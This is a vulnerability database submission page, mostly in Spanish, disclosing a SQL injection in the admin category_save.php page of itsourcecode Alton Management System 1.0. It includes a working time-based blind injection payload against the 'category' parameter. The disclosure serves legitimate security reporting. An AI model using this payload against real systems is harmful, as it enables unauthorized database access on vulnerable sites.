Enviar #381093: itsourcecode Alton Management System 1.0 SQLi category_save.phpinformación

Títuloitsourcecode Alton Management System 1.0 SQLi category_save.php
DescripciónLog in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Due to lax filtering, this parameter can lead to SQL injection vulnerabilities. ---------------POC--------------- Parameter: category (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK ------------------------------------
Fuente⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-3.md
Usuario
 Dee.Mirage (UID 71702)
Sumisión2024-07-27 12:30 (hace 2 años)
Moderación2024-07-30 15:29 (3 days later)
EstadoAceptado
Entrada de VulDB273144 [itsourcecode Alton Management System 1.0 /admin/category_save.php Clase inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!